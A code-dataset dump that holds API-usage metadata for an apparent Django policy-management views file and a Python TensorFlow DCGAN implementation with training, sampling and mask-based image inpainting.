"line_number": 78, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_from_policies_task.delay", "line_number": 84, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_from_policies_task", "line_number": 84, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 92, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 92, 
"usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_from_policies_task.delay", "line_number": 95, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_from_policies_task", "line_number": 95, "usage_type": "name"}, {"api_name": "tasks.generate_agent_tasks_from_policies_task.delay", "line_number": 96, "usage_type": "call"}, {"api_name": "tasks.generate_agent_tasks_from_policies_task", "line_number": 96, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 99, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 102, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 106, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 107, "usage_type": "call"}, {"api_name": "serializers.AutoTaskPolicySerializer", "line_number": 107, "usage_type": "call"}, {"api_name": "autotasks.models.AutomatedTask.objects.filter", "line_number": 111, "usage_type": "call"}, {"api_name": "autotasks.models.AutomatedTask.objects", "line_number": 111, "usage_type": "attribute"}, {"api_name": "autotasks.models.AutomatedTask", "line_number": 111, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 112, "usage_type": "call"}, {"api_name": "serializers.PolicyTaskStatusSerializer", "line_number": 112, "usage_type": "call"}, {"api_name": "autotasks.models.AutomatedTask.objects.filter", "line_number": 116, "usage_type": "call"}, {"api_name": "autotasks.models.AutomatedTask.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "autotasks.models.AutomatedTask", "line_number": 116, "usage_type": "name"}, {"api_name": "tasks.run_win_policy_autotask_task.delay", "line_number": 117, "usage_type": "call"}, {"api_name": "tasks.run_win_policy_autotask_task", "line_number": 117, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 118, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 121, "usage_type": "name"}, {"api_name": "checks.models", "line_number": 123, "usage_type": "name"}, {"api_name": "checks.models.Check.objects.filter", "line_number": 123, "usage_type": "call"}, {"api_name": "checks.models.Check.objects", "line_number": 123, "usage_type": "attribute"}, {"api_name": "checks.models.Check", "line_number": 123, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 124, "usage_type": "call"}, {"api_name": "serializers.PolicyCheckSerializer", "line_number": 124, "usage_type": "call"}, {"api_name": "checks.models", "line_number": 124, "usage_type": "argument"}, {"api_name": "checks.models", "line_number": 127, "usage_type": "name"}, {"api_name": "checks.models.Check.objects.filter", "line_number": 127, "usage_type": "call"}, {"api_name": "checks.models.Check.objects", "line_number": 127, "usage_type": "attribute"}, {"api_name": "checks.models.Check", "line_number": 127, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 128, "usage_type": "call"}, {"api_name": "serializers.PolicyCheckStatusSerializer", "line_number": 128, "usage_type": "call"}, {"api_name": "checks.models", "line_number": 128, "usage_type": "argument"}, {"api_name": "rest_framework.views.APIView", "line_number": 131, "usage_type": "name"}, {"api_name": "clients.models", "line_number": 134, "usage_type": "name"}, {"api_name": 
"clients.models.Client.objects.all", "line_number": 134, "usage_type": "call"}, {"api_name": "clients.models.Client.objects", "line_number": 134, "usage_type": "attribute"}, {"api_name": "clients.models.Client", "line_number": 134, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 135, "usage_type": "call"}, {"api_name": "serializers.PolicyOverviewSerializer", "line_number": 135, "usage_type": "call"}, {"api_name": "clients.models", "line_number": 135, "usage_type": "argument"}, {"api_name": "rest_framework.views.APIView", "line_number": 138, "usage_type": "name"}, {"api_name": "models.Policy.objects.filter", "line_number": 144, "usage_type": "call"}, {"api_name": "models.Policy.objects", "line_number": 144, "usage_type": "attribute"}, {"api_name": "models.Policy", "line_number": 144, "usage_type": "name"}, {"api_name": "clients.serializers.ClientSerializer", "line_number": 157, "usage_type": "call"}, {"api_name": "clients.serializers.ClientSerializer", "line_number": 160, "usage_type": "call"}, {"api_name": "clients.serializers.SiteSerializer", "line_number": 172, "usage_type": "call"}, {"api_name": "clients.serializers.SiteSerializer", "line_number": 181, "usage_type": "call"}, {"api_name": "agents.serializers.AgentHostnameSerializer", "line_number": 185, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 203, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 203, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 206, "usage_type": "call"}, {"api_name": "clients.models.Client", "line_number": 206, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 217, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 217, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 224, "usage_type": "call"}, {"api_name": "clients.models.Site", "line_number": 224, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 234, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 234, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 242, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 242, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 245, "usage_type": "call"}, {"api_name": "clients.models.Client", "line_number": 245, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 255, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 255, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 262, "usage_type": "call"}, {"api_name": "clients.models.Site", "line_number": 262, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 272, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 272, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 284, "usage_type": "call"}, {"api_name": "clients.models.Client", "line_number": 284, "usage_type": "argument"}, {"api_name": 
"tasks.generate_agent_checks_by_location_task.delay", "line_number": 291, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 291, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 298, "usage_type": "call"}, {"api_name": "clients.models.Site", "line_number": 298, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 305, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 305, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 315, "usage_type": "call"}, {"api_name": "clients.models.Client", "line_number": 315, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 322, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 322, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 329, "usage_type": "call"}, {"api_name": "clients.models.Site", "line_number": 329, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 335, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 335, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 343, "usage_type": "call"}, {"api_name": "agents.models.Agent", "line_number": 343, "usage_type": "argument"}, {"api_name": "models.Policy.objects.get", "line_number": 346, "usage_type": "call"}, {"api_name": "models.Policy.objects", "line_number": 346, "usage_type": "attribute"}, {"api_name": "models.Policy", "line_number": 346, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 361, "usage_type": "call"}, {"api_name": "agents.models.Agent.objects.get", "line_number": 371, "usage_type": "call"}, {"api_name": "agents.models.Agent.objects", "line_number": 371, "usage_type": "attribute"}, {"api_name": "agents.models.Agent", "line_number": 371, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 372, "usage_type": "call"}, {"api_name": "serializers.RelatedAgentPolicySerializer", "line_number": 372, "usage_type": "call"}, {"api_name": "clients.models.Site.objects.get", "line_number": 375, "usage_type": "call"}, {"api_name": "clients.models.Site.objects", "line_number": 375, "usage_type": "attribute"}, {"api_name": "clients.models.Site", "line_number": 375, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 376, "usage_type": "call"}, {"api_name": "serializers.RelatedSitePolicySerializer", "line_number": 376, "usage_type": "call"}, {"api_name": "clients.models.Client.objects.get", "line_number": 379, "usage_type": "call"}, {"api_name": "clients.models.Client.objects", "line_number": 379, "usage_type": "attribute"}, {"api_name": "clients.models.Client", "line_number": 379, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 380, "usage_type": "call"}, {"api_name": "serializers.RelatedClientPolicySerializer", "line_number": 380, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 383, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 383, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 383, "usage_type": "name"}, {"api_name": 
"rest_framework.views.APIView", "line_number": 386, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 390, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 390, "usage_type": "argument"}, {"api_name": "winupdate.serializers.WinUpdatePolicySerializer", "line_number": 392, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 397, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 401, "usage_type": "call"}, {"api_name": "winupdate.models.WinUpdatePolicy", "line_number": 401, "usage_type": "argument"}, {"api_name": "winupdate.serializers.WinUpdatePolicySerializer", "line_number": 403, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 409, "usage_type": "call"}, {"api_name": "agents.models", "line_number": 414, "usage_type": "name"}, {"api_name": "agents.models", "line_number": 416, "usage_type": "name"}, {"api_name": "agents.models.Agent.objects.prefetch_related", "line_number": 416, "usage_type": "call"}, {"api_name": "agents.models.Agent.objects", "line_number": 416, "usage_type": "attribute"}, {"api_name": "agents.models.Agent", "line_number": 416, "usage_type": "name"}, {"api_name": "agents.models", "line_number": 420, "usage_type": "name"}, {"api_name": "agents.models.Agent.objects.prefetch_related", "line_number": 420, "usage_type": "call"}, {"api_name": "agents.models.Agent.objects", "line_number": 420, "usage_type": "attribute"}, {"api_name": "agents.models.Agent", "line_number": 420, "usage_type": "name"}, {"api_name": "agents.models", "line_number": 424, "usage_type": "name"}, {"api_name": "agents.models.Agent.objects.prefetch_related", "line_number": 424, "usage_type": "call"}, {"api_name": "agents.models.Agent.objects", "line_number": 424, "usage_type": "attribute"}, {"api_name": "agents.models.Agent", "line_number": 424, "usage_type": "name"}, {"api_name": "agents.models", "line_number": 426, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 449, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 453, "usage_type": "call"}, {"api_name": "winupdate.models.WinUpdatePolicy", "line_number": 453, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 455, "usage_type": "call"}]} +{"seq_id": "607127798", "text": "'''\n# model.py\n#\n# Implement DCGAN model\n'''\n\nimport time\nimport math\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom model_funcs import *\n \ndef conv_out_size_same(size, stride):\n return int(math.ceil(float(size) / float(stride)))\n \nclass DCGAN:\n def __init__(self, sess, input_height=64, input_width=64, batch_size=64, sample_num = 64, output_height=64, output_width=64,\n g_dim=[1024, 512, 256, 128], d_dim=[64, 128, 256, 512], s_size=4, y_dim=None, z_dim=100, dataset='SVHN'):\n '''\n Initialize variables for implementation and calculations\n Args:\n batch_size: The size of the batch\n g_dim: Dimensions of generator filters in conv layers, as an array\n d_dim: Dimensions of discriminator filters in conv layers, as an array\n \n '''\n self.sess = sess\n self.batch_size = batch_size\n self.sample_num = sample_num\n \n self.input_height = input_height\n self.input_width = input_width\n self.output_height = output_height\n self.output_width = output_width\n\n self.g_dim = g_dim + [3]\n self.d_dim = [3] + d_dim\n\n self.s_size = s_size\n self.y_dim = y_dim\n 
self.z_dim = z_dim\n \n self.dataset = dataset\n \n self.reuse = False\n \n \n self.z = tf.random_uniform([self.batch_size, self.z_dim], minval=-1.0, maxval=1.0)\n self.z_sum = tf.summary.histogram(\"z\", self.z)\n \n self.build_model()\n \n \n \n def inpainting(self,learning_rate,test_image,iterations,mask_choice='block_mask',lamda=0.002):\n '''\n Test of Semantic inpainting\n this function applies a mask\n to the input image and then produces a visually similar image to the original\n \n uses functions from utils\n Input Arguments\n test- a single test image\n Outputs\n outputs- predicted images to match masked images. traverses a manifold using back-propogation\n '''\n import numpy as np\n import tensorflow as tf\n from utils import block_mask\n from utils import random_mask\n from utils import half_missing_mask\n \n #apply mask to image and keep mask for later use\n self.image = test_image\n \n if mask_choice == 'block_mask':\n masked_test, mask = block_mask(self.image,30)\n elif mask_choice == 'random_mask':\n masked_test, mask = random_mask(self.image,0.6)\n elif mask_choice == 'half_missing_mask':\n masked_test, mask = half_missing_mask(self.image)\n else:\n print('incorrect mask choice')\n \n \n #reshape images and masks to be compatible with output from generator\n test_image = np.reshape(test_image,(1,64,64,3))\n mask = np.reshape(mask,(1,64,64,3))\n masked_test = np.reshape(masked_test,(1,64,64,3))\n \n #change image, mask and learning rate to tensors\n self.image = tf.convert_to_tensor(test_image, dtype=tf.float32)\n self.mask = tf.convert_to_tensor(mask,dtype=tf.float32)\n self.learning_rate = tf.convert_to_tensor(learning_rate,dtype=tf.float32)\n \n \n \n #generate random z as a changeable variable \n self.z = tf.random_uniform([1,100],minval=-1,maxval=1,dtype=tf.float32,seed=None,name='z')\n \n #generate weights for contextual loss\n weight = np.zeros_like(mask)\n n = weight.shape[1]\n for i in range(n):\n for j in range(n):\n if (j-4) > 0 and (j+4) < (n - 4) and (i-4) >0 and i+4 < (n - 4) and mask[0,i,j,0] ==1:\n cumulative_sum = 0;\n for k in range(-3,3):\n for l in range(-3,3):\n if mask[0,i+k,l+j,0] ==0 and l!=0 and k!=0:\n cumulative_sum = cumulative_sum + 1\n cumulative_sum = cumulative_sum/49\n weight[:,i,j,:] = cumulative_sum\n #convert to tensor\n self.weight = tf.convert_to_tensor(weight,dtype=tf.float32)\n \n \n \n #Define loss as sum of both types of loss\n self.weighted_context_loss = tf.reduce_sum( tf.abs( tf.multiply(self.weight , tf.multiply(self.generator(self.z),self.mask) - tf.multiply(self.image,self.mask) ) ) )\n self.perceptual_loss = self.g_loss \n self.complete_loss = self.weighted_context_loss + lamda*self.perceptual_loss\n \n #define optimization function (gradient descent)\n self.gradients = tf.gradients(self.complete_loss,self.z)\n \n #gradient descent back propogation to update input z\n tf.global_variables_initializer().run()\n for i in range(iterations):\n \n loss, g, Gz = self.sess.run([self.complete_loss,self.gradients,self.generator(self.z)])\n \n self.z = self.z - g[0]*learning_rate \n \n \n #rescale image Gz properly\n Gz = ((Gz + 1) / 2) * 255\n #crop out center and add it to test image\n fill = tf.multiply(tf.ones_like(self.mask) - self.mask,Gz)\n new_image = masked_test + fill\n \n return new_image \n \n \n def generator(self, inputs, training=False):\n '''\n Implementation of discriminator\n \n Input arguments:\n inputs - image \n \n Outputs:\n \n '''\n \n with tf.variable_scope('generator', reuse=tf.AUTO_REUSE):\n #reshape from 
inputs\n reshape_out = tf.layers.dense(inputs, self.g_dim[0] * self.s_size * self.s_size)\n reshape_out = tf.reshape(reshape_out, [-1, self.s_size, self.s_size, self.g_dim[0]])\n reshape_out = tf.nn.relu(tf.layers.batch_normalization(reshape_out, training=training), name='g_reshape')\n \n # deconv layer 1\n conv_1 = tf.layers.conv2d_transpose(reshape_out, self.g_dim[1], [5, 5], strides=(2, 2), padding='SAME')\n conv_1 = tf.nn.relu(tf.layers.batch_normalization(conv_1, training=training), name='g_conv_1')\n \n # deconv layer 2\n conv_2 = tf.layers.conv2d_transpose(conv_1, self.g_dim[2], [5, 5], strides=(2, 2), padding='SAME')\n conv_2 = tf.nn.relu(tf.layers.batch_normalization(conv_2, training=training), name='g_conv_2')\n \n # deconv layer 3\n conv_3 = tf.layers.conv2d_transpose(conv_2, self.g_dim[3], [5, 5], strides=(2, 2), padding='SAME')\n conv_3 = tf.nn.relu(tf.layers.batch_normalization(conv_3, training=training), name='g_conv_3')\n \n # deconv layer 4\n conv_4 = tf.layers.conv2d_transpose(conv_3, self.g_dim[4], [5, 5], strides=(2, 2), padding='SAME')\n \n #output images\n outputs = tf.tanh(conv_4, name='g_outputs') # Output shape is [batch_size (64), height (64), width (64), channels (3)]\n \n self.reuse = True\n self.variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='generator')\n return outputs\n \n def discriminator(self, inputs, training=False):\n '''\n Implementation of discriminator\n Uses functions from model_funcs.py\n \n Input arguments:\n inputs\n \n Outputs:\n \n '''\n inputs = tf.convert_to_tensor(inputs)\n \n #with tf.variable_scope('discriminator') as scope:\n with tf.variable_scope('discriminator', reuse=tf.AUTO_REUSE) as scope:\n # conv layer 1\n conv_1 = tf.layers.conv2d(inputs, self.d_dim[1], [5, 5], strides=(2, 2), padding='SAME')\n conv_1 = leaky_relu(tf.layers.batch_normalization(conv_1, training=training), name='d_conv_1')\n \n # conv layer 2\n conv_2 = tf.layers.conv2d(conv_1, self.d_dim[2], [5, 5], strides=(2, 2), padding='SAME')\n conv_2 = leaky_relu(tf.layers.batch_normalization(conv_2, training=training), name='d_conv_2')\n \n # conv layer 3\n conv_3 = tf.layers.conv2d(conv_2, self.d_dim[3], [5, 5], strides=(2, 2), padding='SAME')\n conv_3 = leaky_relu(tf.layers.batch_normalization(conv_3, training=training), name='d_conv_3')\n \n # conv layer 4\n conv_4 = tf.layers.conv2d(conv_3, self.d_dim[4], [5, 5], strides=(2, 2), padding='SAME')\n conv_4 = leaky_relu(tf.layers.batch_normalization(conv_4, training=training), name='d_conv_4')\n \n #reshape output\n batch_size = conv_4.get_shape()[0].value\n reshape = tf.reshape(conv_4, [batch_size, -1])\n outputs = tf.layers.dense(reshape, 2, name='d_outputs') # outputs shape is [batch_size, 2]\n \n self.reuse = True\n self.variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='discriminator')\n return outputs\n \n def build_model(self):\n '''\n build model, calculate losses\n '''\n # prep values to build model\n image_dims = [self.input_height, self.input_width, 3]\n self.inputs = tf.placeholder(tf.float32, [self.batch_size] + image_dims, name='real_images')\n inputs = self.inputs # tensor of shape [batch, height, width, channels]\n \n # build models\n generated = self.generator(self.z , training=True)\n g_outputs = self.discriminator(generated, training=True)\n t_outputs = self.discriminator(inputs, training=True)\n \n # Softmax cross entropy loss\n #g_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=g_outputs, labels=tf.zeros([self.batch_size]))\n g_loss = 
tf.nn.sparse_softmax_cross_entropy_with_logits(labels=tf.ones([self.batch_size], dtype=tf.int64), logits=g_outputs)\n        self.g_loss = tf.reduce_mean(g_loss)\n        \n        #d_loss_real = tf.nn.sigmoid_cross_entropy_with_logits(logits=t_outputs, labels=tf.ones([self.batch_size]))\n        d_loss_real = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=tf.ones([self.batch_size], dtype=tf.int64), logits=t_outputs)\n        self.d_loss_real = tf.reduce_mean(d_loss_real)\n        \n        #d_loss_fake = tf.nn.softmax_cross_entropy_with_logits_v2(logits=g_outputs, labels=tf.zeros([self.batch_size]))\n        d_loss_fake = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=tf.zeros([self.batch_size], dtype=tf.int64),logits=g_outputs)\n        self.d_loss_fake = tf.reduce_mean(d_loss_fake)\n        \n        self.d_loss = self.d_loss_real + self.d_loss_fake\n        \n\n    def train(self, epochs=2, batch_size=245, learning_rate=0.0002, beta1=0.5, pre_trained_model=None):\n        '''\n        Trains the DCGAN.\n        Input Args:\n            epochs - number of passes over the training data\n            batch_size - number of images per training batch\n            learning_rate, beta1 - Adam optimizer hyperparameters\n            pre_trained_model - optional name of a saved model to restore\n        \n        Outputs:\n            saves a checkpoint under model/ and sample images during training\n        '''\n        #update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n        #with tf.control_dependencies(update_ops):\n        \n        with tf.variable_scope('optim', reuse=tf.AUTO_REUSE):\n            # using Adam optimizer as specified in the project paper\n            d_optim = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=beta1).minimize(self.d_loss) #discriminator optimizer\n            g_optim = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=beta1).minimize(self.g_loss) # generator optimizer\n        \n        counter = 0\n        cur_model_name = 'DCGAN_{}'.format(int(time.time()))\n        \n        tf.global_variables_initializer().run()\n        writer = tf.summary.FileWriter(\"log/{}\".format(cur_model_name), self.sess.graph)\n        saver = tf.train.Saver()\n        \n        start_time = time.time()\n        \n        if pre_trained_model is not None:\n            try:\n                print(\"Load the model from: {}\".format(pre_trained_model))\n                saver.restore(self.sess, 'model/{}'.format(pre_trained_model))\n            except Exception:\n                raise ValueError(\"Load model Failed!\")\n        \n        \n        # run\n        #with tf.Session() as sess:\n        #    sess.run(init)\n        \n        #generate batches based on which dataset is being used\n        #if self.data_set == '': --> uncomment if needed\n        batches, iters = get_batches(batch_size, self.dataset)\n        \n        # getting number of training iterations\n        #iters = 1000\n        print('number of batches for training: {}'.format(iters))\n\n        for epc in range(epochs):\n            print(\"epoch {} \".format(epc+1))\n            for i in range(iters):\n                counter += 1\n                #get batch\n                batch_images = next(batches)\n\n                batch_z = np.random.uniform(-1, 1, [self.batch_size, self.z_dim]).astype(np.float32)\n\n                #_, g_loss_value, d_loss_value = sess.run([train_op, losses[self.g], losses[self.d]])\n\n                # Update D network\n                _, D_loss_curr = self.sess.run([d_optim, self.d_loss], feed_dict={ self.inputs: batch_images, self.z: batch_z })\n\n                # Update G network\n                _, G_loss_curr = self.sess.run([g_optim, self.g_loss], feed_dict={ self.z: batch_z })\n\n                # ---> Run g_optim twice to make sure that d_loss does not go to zero (different from paper)\n                _, G_loss_curr = self.sess.run([g_optim, self.g_loss], feed_dict={ self.z: batch_z })\n                \n                errD_fake = self.d_loss_fake.eval({self.z: batch_z})\n                errD_real = self.d_loss_real.eval({self.inputs: batch_images})\n                errG = self.g_loss.eval({self.z: batch_z})\n                \n                if counter % 10 == 1:\n                    print(\"Epoch: [%2d/%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f\" \\\n                        % (epc+1, epochs, i, iters,\n                            time.time() - start_time, errD_fake+errD_real, errG))\n                \n                if 
counter % 100 == 1:\n                    # do validation\n                    sample_in = tf.random_uniform([self.batch_size, self.z_dim], minval=-1.0, maxval=1.0)\n                    sample_input = self.sampler(sample_in)\n                    samples = self.sess.run([sample_input])\n                    #print(samples)\n                    #rescale generated image\n                    samples = (samples[0] + 1) * 255 / 2\n                    \n                    \n                    #show generated image; save before plt.show(), which clears the current figure\n                    img=samples[0,:,:,:]\n                    #print(img)\n                    img = img.astype(int)\n                    plt.imshow(img)\n                    plt.savefig('gen_train_img/img_{}'.format(counter+epc))\n                    plt.show()\n        \n        # Save checkpoint\n        saver.save(self.sess, 'model/{}'.format(cur_model_name))\n        print(\"Training complete. Model named {}.\".format(cur_model_name))\n    \n    def sampler(self, z, y=None):\n        # This function creates sample images for validation in the training function\n        with tf.variable_scope('generator', reuse=tf.AUTO_REUSE) as scope:\n            #scope.reuse_variables()\n            \n            #reshape from inputs \n            reshape_out = tf.layers.dense(z, self.g_dim[0] * self.s_size * self.s_size)\n            reshape_out = tf.reshape(reshape_out, [-1, self.s_size, self.s_size, self.g_dim[0]])\n            reshape_out = tf.nn.relu(tf.layers.batch_normalization(reshape_out, training=False), name='g_reshape')\n        \n            # deconv layer 1\n            conv_1 = tf.layers.conv2d_transpose(reshape_out, self.g_dim[1], [5, 5], strides=(2, 2), padding='SAME')\n            conv_1 = tf.nn.relu(tf.layers.batch_normalization(conv_1, training=False), name='g_conv_1')\n        \n            # deconv layer 2\n            conv_2 = tf.layers.conv2d_transpose(conv_1, self.g_dim[2], [5, 5], strides=(2, 2), padding='SAME')\n            conv_2 = tf.nn.relu(tf.layers.batch_normalization(conv_2, training=False), name='g_conv_2')\n        \n            # deconv layer 3\n            conv_3 = tf.layers.conv2d_transpose(conv_2, self.g_dim[3], [5, 5], strides=(2, 2), padding='SAME')\n            conv_3 = tf.nn.relu(tf.layers.batch_normalization(conv_3, training=False), name='g_conv_3')\n        \n            # deconv layer 4\n            conv_4 = tf.layers.conv2d_transpose(conv_3, self.g_dim[4], [5, 5], strides=(2, 2), padding='SAME')\n        \n            #output image\n            return tf.nn.tanh(conv_4)\n    \n    \n", "sub_path": "model_old.py", "file_name": "model_old.py", "file_ext": "py", "file_size_in_byte": 16796, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "math.ceil", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.random_uniform", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 51, "usage_type": "attribute"}, {"api_name": "utils.block_mask", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.random_mask", "line_number": 81, "usage_type": "call"}, {"api_name": "utils.half_missing_mask", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 95, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 96, "usage_type": "attribute"}, {"api_name": "tensorflow.random_uniform", "line_number": 101, "usage_type": "call"}, 
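The per-pixel weighting used in inpainting() above gives each known pixel a weight equal to the fraction of missing pixels in the surrounding 7x7 window. A minimal NumPy sketch of that weighting, kept separate from the record above; the function name context_loss_weights, the toy mask, and the window-size parameter are illustrative assumptions, not part of the original model:

import numpy as np

def context_loss_weights(mask, window=7):
    # mask: 2D array with 1 = known pixel, 0 = missing pixel (assumed convention)
    half = window // 2
    n = mask.shape[0]
    weight = np.zeros_like(mask, dtype=float)
    for i in range(half, n - half):
        for j in range(half, n - half):
            if mask[i, j] == 1:
                patch = mask[i - half:i + half + 1, j - half:j + half + 1]
                # fraction of missing neighbours in the window around (i, j)
                weight[i, j] = np.sum(patch == 0) / float(window * window)
    return weight

# toy 20x20 mask with an 8x8 hole in the centre
m = np.ones((20, 20))
m[6:14, 6:14] = 0
w = context_loss_weights(m)
print(w.max())            # largest weights sit on the hole boundary
print(w[5, 10], w[0, 0])  # boundary pixel vs. far-away pixel

Pixels bordering the hole dominate the weighted context loss, which is what steers the latent search toward filling the hole consistently with its surroundings.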
{"api_name": "tensorflow.float32", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 117, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_sum", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.multiply", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.gradients", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.multiply", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.ones_like", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 158, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 160, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 160, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 161, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 162, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 162, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 162, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 162, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 165, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 165, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 166, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 166, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 166, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 166, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 169, "usage_type": "call"}, {"api_name": 